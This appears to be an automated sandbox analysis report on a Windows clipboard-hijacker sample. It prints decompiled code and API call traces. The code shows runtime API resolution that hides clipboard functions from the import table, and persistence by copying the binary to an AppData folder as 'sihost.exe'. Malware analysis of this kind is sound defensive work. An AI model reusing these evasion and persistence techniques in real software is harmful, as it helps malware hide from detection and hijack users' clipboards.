                                                                                                                                                                                          0x00405d89
                                                                                                                                                                                          0x00405d91
                                                                                                                                                                                          0x00405d96
                                                                                                                                                                                          0x00405d9b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405da1
                                                                                                                                                                                          0x00405da5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405da5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405d80
                                                                                                                                                                                          0x00405d4f
                                                                                                                                                                                          0x00405d54
                                                                                                                                                                                          0x00405d59
                                                                                                                                                                                          0x00405d5c
                                                                                                                                                                                          0x00405d61
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405d67
                                                                                                                                                                                          0x00405d6f
                                                                                                                                                                                          0x00405d74
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00405d74
                                                                                                                                                                                          0x00405d61
                                                                                                                                                                                          0x00405d4d
                                                                                                                                                                                          0x00405d43
                                                                                                                                                                                          0x00405d38
                                                                                                                                                                                          0x00405d20
                                                                                                                                                                                          0x00405d14
                                                                                                                                                                                          0x00000000

APIs
Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
Similarity
• API ID: _fseek_malloc_memset
• String ID:
• API String ID: 208892515-0
• Opcode ID: 67ac19b9a0d70d7af40f5452e8cb91eb92d584cf98b69a29d9abb47510c8f44e
• Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
• Opcode Fuzzy Hash: 67ac19b9a0d70d7af40f5452e8cb91eb92d584cf98b69a29d9abb47510c8f44e
• Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 91%
			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t59;
				intOrPtr* _t61;
				signed int _t63;
				void* _t68;
				signed int _t69;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				signed int _t88;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				intOrPtr* _t100;
				void* _t101;

				_t90 = __edx;
				if(_a8 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t100 = _a16;
					_t105 = _t100;
					if(_t100 != 0) {
						_t82 = _a4;
						__eflags = _t82;
						if(__eflags == 0) {
							goto L3;
						}
						_t63 = _t59 | 0xffffffff;
						_t90 = _t63 % _a8;
						__eflags = _a12 - _t63 / _a8;
						if(__eflags > 0) {
							goto L3;
						}
						_t97 = _a8 * _a12;
						__eflags =  *(_t100 + 0xc) & 0x0000010c;
						_v8 = _t82;
						_v16 = _t97;
						_t81 = _t97;
						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t100 + 0x18);
						}
						__eflags = _t97;
						if(_t97 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t84 =  *(_t100 + 0xc) & 0x00000108;
								__eflags = _t84;
								if(_t84 == 0) {
									L18:
									__eflags = _t81 - _v12;
									if(_t81 < _v12) {
										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
										__eflags = _t68 - 0xffffffff;
										if(_t68 == 0xffffffff) {
											L34:
											_t69 = _t97;
											L35:
											return (_t69 - _t81) / _a8;
										}
										_v8 = _v8 + 1;
										_t72 =  *(_t100 + 0x18);
										_t81 = _t81 - 1;
										_v12 = _t72;
										__eflags = _t72;
										if(_t72 <= 0) {
											_v12 = 1;
										}
										goto L31;
									}
									__eflags = _t84;
									if(_t84 == 0) {
										L21:
										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040FA20(_t90, _t98, _t100));
										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040C1FB(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
                                                                                                                                                                                          								_t81 = _t81 - _t99;
                                                                                                                                                                                          								_v8 = _v8 + _t99;
                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                          								L31:
                                                                                                                                                                                          								__eflags = _t81;
                                                                                                                                                                                          							} while (_t81 != 0);
                                                                                                                                                                                          							goto L32;
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					L3:
                                                                                                                                                                                          					_t61 = E0040BFC1(_t105);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					 *_t61 = 0x16;
                                                                                                                                                                                          					E0040E744(_t90, 0, _t100);
                                                                                                                                                                                          					goto L4;
                                                                                                                                                                                          				}
                                                                                                                                                                                          			}
                                                                                                                                                                                          0x0040bad1
                                                                                                                                                                                          0x0040bad2
                                                                                                                                                                                          0x0040bad8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040badd

APIs
• __flush.LIBCMT ref: 0040BB6E
• __fileno.LIBCMT ref: 0040BB8E
• __locking.LIBCMT ref: 0040BB95
• __flsbuf.LIBCMT ref: 0040BBC0
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
Similarity
• API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
• String ID:
• API String ID: 3240763771-0
• Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
• Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
• Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
• Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
Uniqueness
Uniqueness Score: -1.00%

APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
• __isleadbyte_l.LIBCMT ref: 00415307
• MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
• MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
• Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
• Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
• Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.433438157.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.433496416.0000000000426000.00000040.00020000.sdmp
• Associated: 00000001.00000002.433522962.0000000000432000.00000040.00020000.sdmp
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
• Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
• Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
• Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                          Executed Functions

C-Code - Quality: 93%

// E00401000 is the import resolver of the clipboard-hijacker component.
// Every API it needs is looked up at runtime with LoadLibraryW/GetProcAddress
// and written into a table of global function pointers at 0x404000-0x40405c,
// so the PE's static import table does not reveal the clipboard APIs
// (OpenClipboard, GetClipboardData, EmptyClipboard, SetClipboardData,
// CloseClipboard) that the component actually uses. The function returns
// the last resolved pointer (CloseClipboard), or NULL if kernel32 could not
// be loaded.
E00401000() {
	struct HINSTANCE__* _v8;   // kernel32.dll
	struct HINSTANCE__* _v12;  // Shlwapi.dll
	struct HINSTANCE__* _v16;  // User32.dll
	struct HINSTANCE__* _v20;  // ntdll.dll
	struct HINSTANCE__* _t11;
	_Unknown_base(*)()* _t12;
	struct HINSTANCE__* _t15;  // Shell32.dll
	struct HINSTANCE__* _t16;  // Ole32.dll
	_Unknown_base(*)()* _t19;
	_Unknown_base(*)()* _t28;
	_Unknown_base(*)()* _t40;
	_Unknown_base(*)()* _t49;
	void* _t50;
	struct HINSTANCE__* _t52;
	void* _t54;
	struct HINSTANCE__* _t56;
	void* _t58;
	struct HINSTANCE__* _t60;
	struct HINSTANCE__* _t61;
	struct HINSTANCE__* _t62;

	_t11 = LoadLibraryW(L"kernel32.dll");
	_v8 = _t11;
	if(_t11 != 0) {
		// LoadLibraryW is itself resolved by name and stored; the next
		// library is loaded through that stored pointer rather than directly.
		_t12 = GetProcAddress(_t11, "LoadLibraryW");
		 *0x40400c = _t12;
		_v12 =  *_t12(L"Shlwapi.dll", _t54, _t58, _t50);
		_v20 = LoadLibraryW(L"ntdll.dll");
		_t15 = LoadLibraryW(L"Shell32.dll");
		_t16 = LoadLibraryW(L"Ole32.dll"); // executed
		_v16 = LoadLibraryW(L"User32.dll");
		LoadLibraryW(L"Ole32.dll"); // loaded a second time; handle unused
		// Same trick for GetProcAddress: stored at 0x404038 and then called
		// through the pointer for the first kernel32 lookup.
		_t19 = GetProcAddress(_v8, "GetProcAddress");
		_t60 = _v8;
		 *0x404038 = _t19;
		 *0x40401c =  *_t19(_t60, "GetModuleFileNameW");
		 *0x404044 = GetProcAddress(_t60, "CreateDirectoryW");
		 *0x404024 = GetProcAddress(_t60, "GlobalAlloc");
		 *0x40403c = GetProcAddress(_t60, "GlobalFree");
		 *0x404000 = GetProcAddress(_t60, "GlobalLock");   // Global* pair: clipboard HGLOBAL handling
		 *0x404034 = GetProcAddress(_t60, "GlobalUnlock");
		 *0x404010 = GetProcAddress(_t60, "LocalAlloc");
		 *0x404030 = GetProcAddress(_t60, "LocalFree");
		_t28 = GetProcAddress(_t60, "lstrlenW");
		_t61 = _v12;
		 *0x404020 = _t28;
		// Shlwapi string helpers, used to inspect clipboard text.
		 *0x404018 = GetProcAddress(_t61, "StrChrW");
		 *0x404054 = GetProcAddress(_t61, "StrStrW");
		GetProcAddress(_t61, "StrStrIW");     // result unused
		GetProcAddress(_t61, "StrToIntExW");  // result unused
		 *0x404058 = GetProcAddress(_t61, "PathIsDirectoryW");
		GetProcAddress(_t16, "CoInitialize"); // result unused
		_t56 = _v8;
		GetProcAddress(_t56, "HeapFree");     // result unused
		GetProcAddress(_t56, "CreateMutexA"); // result unused
		 *0x404040 = GetProcAddress(_t56, "CreateMutexW"); // single-instance mutex
		 *0x40402c = GetProcAddress(_t56, "GetLastError");
		GetProcAddress(_t15, "SHGetFolderPathA"); // result unused
		_t40 = GetProcAddress(_t61, "PathAppendW");
		_t62 = _v16;
		 *0x404014 = _t40;
		GetProcAddress(_t62, "StringCbPrintfW"); // result unused
		_t52 = _v20;
		// memset/memcpy are taken from ntdll exports rather than the CRT.
		 *0x404028 = GetProcAddress(_t52, "memset");
		GetProcAddress(_t52, "wmemset"); // result unused
		 *0x404004 = GetProcAddress(_t52, "memcpy");
		// The clipboard API set that the hijacker detection keys on.
		 *0x404048 = GetProcAddress(_t62, "OpenClipboard");
		 *0x40405c = GetProcAddress(_t62, "GetClipboardData");
		 *0x404008 = GetProcAddress(_t62, "EmptyClipboard");
		 *0x404050 = GetProcAddress(_t62, "SetClipboardData");
		_t49 = GetProcAddress(_t62, "CloseClipboard");
		 *0x40404c = _t49;
		return _t49;
	}
	return _t11;
}
0x0040100b
0x00401011
0x00401016
0x0040102b
0x00401032
0x0040103e
0x0040104c
0x0040104f
0x0040105c
0x00401074
0x00401077
0x00401085
0x00401087
0x00401090
0x0040109d
0x004010ae
0x004010bf
0x004010d0
0x004010e1
0x004010f2
0x00401103
0x00401114
0x00401119
0x0040111f
0x00401128
0x00401139
0x0040114a
0x0040114f
0x0040115b
0x00401173
0x00401178
0x0040117e
0x00401187
0x00401193
0x004011ab
0x004011bc
0x004011c1
0x004011cd
0x004011d3
0x004011dc
0x004011e1
0x004011e7
0x004011fc
0x00401201
0x00401219
0x0040122a
0x0040123b
0x0040124c
0x0040125d
0x00401262
0x0040126a
0x00000000
0x0040126f
0x00401271

APIs
• LoadLibraryW.KERNEL32(kernel32.dll,00401B85), ref: 0040100B
• GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 0040102B
• LoadLibraryW.KERNEL32(ntdll.dll), ref: 00401041
• LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040104F
• LoadLibraryW.KERNELBASE(Ole32.dll), ref: 0040105C
• LoadLibraryW.KERNEL32(User32.dll), ref: 00401069
• LoadLibraryW.KERNEL32(Ole32.dll), ref: 00401077
• GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00401085
• GetProcAddress.KERNEL32(?,CreateDirectoryW), ref: 004010A2
• GetProcAddress.KERNEL32(?,GlobalAlloc), ref: 004010B3
• GetProcAddress.KERNEL32(?,GlobalFree), ref: 004010C4
• GetProcAddress.KERNEL32(?,GlobalLock), ref: 004010D5
• GetProcAddress.KERNEL32(?,GlobalUnlock), ref: 004010E6
• GetProcAddress.KERNEL32(?,LocalAlloc), ref: 004010F7
• GetProcAddress.KERNEL32(?,LocalFree), ref: 00401108
• GetProcAddress.KERNEL32(?,lstrlenW), ref: 00401119
• GetProcAddress.KERNEL32(?,StrChrW), ref: 0040112D
• GetProcAddress.KERNEL32(?,StrStrW), ref: 0040113E
• GetProcAddress.KERNEL32(?,StrStrIW), ref: 0040114F
• GetProcAddress.KERNEL32(?,StrToIntExW), ref: 0040115B
• GetProcAddress.KERNEL32(?,PathIsDirectoryW), ref: 00401167
• GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 00401178
• GetProcAddress.KERNEL32(?,HeapFree), ref: 00401187
• GetProcAddress.KERNEL32(?,CreateMutexA), ref: 00401193
• GetProcAddress.KERNEL32(?,CreateMutexW), ref: 0040119F
• GetProcAddress.KERNEL32(?,GetLastError), ref: 004011B0
• GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 004011C1
• GetProcAddress.KERNEL32(?,PathAppendW), ref: 004011CD
• GetProcAddress.KERNEL32(?,StringCbPrintfW), ref: 004011E1
• GetProcAddress.KERNEL32(?,memset), ref: 004011F0
• GetProcAddress.KERNEL32(?,wmemset), ref: 00401201
• GetProcAddress.KERNEL32(?,memcpy), ref: 0040120D
• GetProcAddress.KERNEL32(?,OpenClipboard), ref: 0040121E
• GetProcAddress.KERNEL32(?,GetClipboardData), ref: 0040122F
• GetProcAddress.KERNEL32(?,EmptyClipboard), ref: 00401240
• GetProcAddress.KERNEL32(?,SetClipboardData), ref: 00401251
• GetProcAddress.KERNEL32(?,CloseClipboard), ref: 00401262
Strings
Memory Dump Source
• Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CloseClipboard$CoInitialize$CreateDirectoryW$CreateMutexA$CreateMutexW$EmptyClipboard$GetClipboardData$GetLastError$GetModuleFileNameW$GetProcAddress$GlobalAlloc$GlobalFree$GlobalLock$GlobalUnlock$HeapFree$LoadLibraryW$LocalAlloc$LocalFree$Ole32.dll$OpenClipboard$PathAppendW$PathIsDirectoryW$SHGetFolderPathA$SetClipboardData$Shell32.dll$Shlwapi.dll$StrChrW$StrStrIW$StrStrW$StrToIntExW$StringCbPrintfW$User32.dll$kernel32.dll$lstrlenW$memcpy$memset$ntdll.dll$wmemset
• API String ID: 2238633743-2663791167
• Opcode ID: e6b314939ad2e5d0882570927fe1788e67a826271dba78cacea67a5e4306d291
• Instruction ID: 3a394058c2df3ebd48b943f2ff47fd4c64f81fd9054ada60033702f18f7e04b9
• Opcode Fuzzy Hash: e6b314939ad2e5d0882570927fe1788e67a826271dba78cacea67a5e4306d291
• Instruction Fuzzy Hash: 2151A9F2951310BBC7007FB5AE4DA8A7EFCAA8974371184B7B305F31A1D6B892448B5C
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 88%
			E00401272() {
				short _v524;
				short _v1044;
				WCHAR* _t15;
				int _t19;
				WCHAR* _t24;

				GetModuleFileNameW(0,  &_v1044, 0x104);
				_t15 =  &_v524;
				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t15); // executed
				if(_t15 >= 0) {
					PathAppendW( &_v524, L"\\Microsoft\\Network");
					_t19 = PathIsDirectoryW( &_v524); // executed
					if(_t19 == 0) {
						CreateDirectoryW( &_v524, 0);
					}
					PathAppendW( &_v524, L"\\sihost.exe");
					_t24 = StrStrW( &_v1044,  &_v524);
					_t37 = _t24;
					if(_t24 == 0) {
						CopyFileW( &_v1044,  &_v524, 0); // executed
						E00401339( &_v524, __eflags); // executed
						ExitProcess(0xffffffff);
					} else {
						return E00401339( &_v524, _t37);
					}
				}
				return _t15;
			}
0x0040128b
0x00401291
0x0040129d
0x004012a5
0x004012b3
0x004012c0
0x004012c8
0x004012d2
0x004012d2
0x004012e4
0x004012f8
0x004012fe
                                                                                                                                                                                          0x00401300
                                                                                                                                                                                          0x0040131f
                                                                                                                                                                                          0x0040132b
                                                                                                                                                                                          0x00401332
                                                                                                                                                                                          0x00401302
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00401308
                                                                                                                                                                                          0x00401300
                                                                                                                                                                                          0x0040130f

APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040128B
• SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0040129D
• PathAppendW.SHLWAPI(?,\Microsoft\Network), ref: 004012B3
• PathIsDirectoryW.SHLWAPI(?), ref: 004012C0
• CreateDirectoryW.KERNEL32(?,00000000), ref: 004012D2
• PathAppendW.SHLWAPI(?,\sihost.exe), ref: 004012E4
• StrStrW.SHLWAPI(?,?), ref: 004012F8
• CopyFileW.KERNELBASE(?,?,00000000), ref: 0040131F
• ExitProcess.KERNEL32 ref: 00401332
Strings
Memory Dump Source
• Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Path$AppendDirectoryFile$CopyCreateExitFolderModuleNameProcess
• String ID: \Microsoft\Network$\sihost.exe
• API String ID: 3994694214-2630029166
• Opcode ID: ef3b43e0bf257aa2203ea887fd2ae442e103df6aa474e8697a45c816f97d1015
• Instruction ID: 321b554cca809c1bf1d54d514a62752ba421978cab6a2a8d4ac38374a9334afe
• Opcode Fuzzy Hash: ef3b43e0bf257aa2203ea887fd2ae442e103df6aa474e8697a45c816f97d1015
• Instruction Fuzzy Hash: F1111FB1500229ABDB20DFA1DD4CECB7B7CAB45315F0005B1B769F20A1EA749BC48F68
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000B.00000002.436398329.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
Yara matches
Similarity
• API ID:
• String ID: .$GetProcAddress.$l
• API String ID: 0-2784972518
• Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction ID: 7f43901ff41cce7e1ea3f559b5fe4a880868a647ddb3f09ff72b38aa93bddcbd
• Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
• Instruction Fuzzy Hash: EB3127B6900609DFDB10CF99C884BAEBBFAFF48324F15414AD841B7250D771EA45CBA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(kernel32.dll,00401B85), ref: 0040100B
• GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 0040102B
• LoadLibraryW.KERNEL32(ntdll.dll), ref: 00401041
• LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040104F
• LoadLibraryW.KERNELBASE(Ole32.dll), ref: 0040105C
• LoadLibraryW.KERNEL32(User32.dll), ref: 00401069
• LoadLibraryW.KERNEL32(Ole32.dll), ref: 00401077
• GetProcAddress.KERNEL32(?,GetProcAddress), ref: 00401085
• GetProcAddress.KERNEL32(?,CreateDirectoryW), ref: 004010A2
• GetProcAddress.KERNEL32(?,GlobalAlloc), ref: 004010B3
• GetProcAddress.KERNEL32(?,GlobalFree), ref: 004010C4
• GetProcAddress.KERNEL32(?,GlobalLock), ref: 004010D5
• GetProcAddress.KERNEL32(?,GlobalUnlock), ref: 004010E6
• GetProcAddress.KERNEL32(?,LocalAlloc), ref: 004010F7
• GetProcAddress.KERNEL32(?,LocalFree), ref: 00401108
• GetProcAddress.KERNEL32(?,lstrlenW), ref: 00401119
• GetProcAddress.KERNEL32(?,StrChrW), ref: 0040112D
• GetProcAddress.KERNEL32(?,StrStrW), ref: 0040113E
• GetProcAddress.KERNEL32(?,StrStrIW), ref: 0040114F
• GetProcAddress.KERNEL32(?,StrToIntExW), ref: 0040115B
• GetProcAddress.KERNEL32(?,PathIsDirectoryW), ref: 00401167
• GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 00401178
• GetProcAddress.KERNEL32(?,HeapFree), ref: 00401187
• GetProcAddress.KERNEL32(?,CreateMutexA), ref: 00401193
• GetProcAddress.KERNEL32(?,CreateMutexW), ref: 0040119F
• GetProcAddress.KERNEL32(?,GetLastError), ref: 004011B0
• GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 004011C1
• GetProcAddress.KERNEL32(?,PathAppendW), ref: 004011CD
• GetProcAddress.KERNEL32(?,StringCbPrintfW), ref: 004011E1
• GetProcAddress.KERNEL32(?,memset), ref: 004011F0
• GetProcAddress.KERNEL32(?,wmemset), ref: 00401201
• GetProcAddress.KERNEL32(?,memcpy), ref: 0040120D
• GetProcAddress.KERNEL32(?,OpenClipboard), ref: 0040121E
• GetProcAddress.KERNEL32(?,GetClipboardData), ref: 0040122F
• GetProcAddress.KERNEL32(?,EmptyClipboard), ref: 00401240
• GetProcAddress.KERNEL32(?,SetClipboardData), ref: 00401251
• GetProcAddress.KERNEL32(?,CloseClipboard), ref: 00401262
Strings
Memory Dump Source
• Source File: 0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CloseClipboard$CoInitialize$CreateDirectoryW$CreateMutexA$CreateMutexW$EmptyClipboard$GetClipboardData$GetLastError$GetModuleFileNameW$GetProcAddress$GlobalAlloc$GlobalFree$GlobalLock$GlobalUnlock$HeapFree$LoadLibraryW$LocalAlloc$LocalFree$Ole32.dll$OpenClipboard$PathAppendW$PathIsDirectoryW$SHGetFolderPathA$SetClipboardData$Shell32.dll$Shlwapi.dll$StrChrW$StrStrIW$StrStrW$StrToIntExW$StringCbPrintfW$User32.dll$kernel32.dll$lstrlenW$memcpy$memset$ntdll.dll$wmemset
• API String ID: 2238633743-2663791167
• Opcode ID: 9e805c5a5fdfb2d5f6d0cb3b07f63b098e7b2813301728929bd7755d37c890e2
• Instruction ID: 5c8d3ffcb2fdf28db584ddd3e3092914a888247e1d923de6841585d2316a4f8f
• Opcode Fuzzy Hash: 9e805c5a5fdfb2d5f6d0cb3b07f63b098e7b2813301728929bd7755d37c890e2
• Instruction Fuzzy Hash: 99B1E8A284E3C0AFC7036BB05D599457FB8AD4774231A84E7E281FB1E3D67C4948C76A
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlenW.KERNEL32(02B77408), ref: 00419C04
• _memset.LIBCMT ref: 00419C31
  • Part of subcall function 00419350: GetModuleHandleA.KERNEL32(00421E1C), ref: 0041937E
  • Part of subcall function 00419350: GetProcAddress.KERNEL32(02B77404,00435578), ref: 00419430
  • Part of subcall function 00419350: VirtualProtect.KERNELBASE(02B6F54C,02B77B00,00000040,?), ref: 00419450
  • Part of subcall function 004199E0: GetLastError.KERNEL32 ref: 00419A0C
  • Part of subcall function 004199E0: GetPrivateProfileIntW.KERNEL32(00421E80,00421E70,00000000,00421E30), ref: 00419A2C
  • Part of subcall function 004199E0: GetLastError.KERNEL32 ref: 00419A32
  • Part of subcall function 004199E0: GetNumberFormatA.KERNEL32(00000000,00000000,00421E90,00000000,?,00000000), ref: 00419A58
  • Part of subcall function 004199E0: GetCPInfoExW.KERNEL32(00000000,00000000,?), ref: 00419A69
  • Part of subcall function 004199E0: GetCommandLineW.KERNEL32 ref: 00419A6F
  • Part of subcall function 004199E0: GetStartupInfoA.KERNEL32(00000000), ref: 00419A77
  • Part of subcall function 004199E0: SetFileShortNameA.KERNEL32(00000000,00000000), ref: 00419A81
  • Part of subcall function 004199E0: CreateNamedPipeA.KERNEL32(00421EB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00419AF1
  • Part of subcall function 004199E0: GetBinaryType.KERNEL32(00421ED0,?), ref: 00419B49
  • Part of subcall function 004199E0: HeapDestroy.KERNEL32(00000000), ref: 00419B51
• GetCommState.KERNEL32(00000000,?), ref: 00419CFA
• CreateIoCompletionPort.KERNEL32(00000000,00000000,00000000,00000000), ref: 00419D08
• GetLastError.KERNEL32 ref: 00419D43
• GetProfileStringW.KERNEL32(00421FA8,00421F78,00421F68,?,00000000), ref: 00419D6A
• CreateActCtxA.KERNEL32(?), ref: 00419DD1
• LocalFileTimeToFileTime.KERNEL32(?,00000000), ref: 00419DF7
• UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00419E07
• SetThreadLocale.KERNEL32(00000000), ref: 00419E4C
• HeapWalk.KERNEL32(00000000,00000000), ref: 00419E56
• WriteProfileStringW.KERNEL32(00422040,00422030,00421FF4), ref: 00419E6B
• SetThreadIdealProcessor.KERNEL32(00000000,00000000), ref: 00419E75
• EnumResourceLanguagesW.KERNEL32(00000000,00422120,00422078,00000000,00000000), ref: 00419EC0
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00419EC8
• FindNextFileA.KERNEL32(00000000,?), ref: 00419ED7
• CreateSemaphoreA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00419F09
                                                                                                                                                                                          • GetConsoleAliasExesLengthW.KERNEL32 ref: 00419F0F
                                                                                                                                                                                          • GetSystemTime.KERNEL32(00000000), ref: 00419F17
                                                                                                                                                                                          • GetPrivateProfileIntW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00419F5F
                                                                                                                                                                                          • UnregisterWaitEx.KERNEL32(00000000,00000000), ref: 00419F7E
                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 00419F8B
                                                                                                                                                                                          • FindResourceExA.KERNEL32(00000000,004221C0,00422194,00000000), ref: 00419F9F
                                                                                                                                                                                          • FindAtomW.KERNEL32(004221F0), ref: 00419FDF
                                                                                                                                                                                          • GetThreadContext.KERNEL32(00000000,00000000), ref: 00419FE9
                                                                                                                                                                                          • OpenMutexA.KERNEL32(00000000,00000000,00422248), ref: 00419FF8
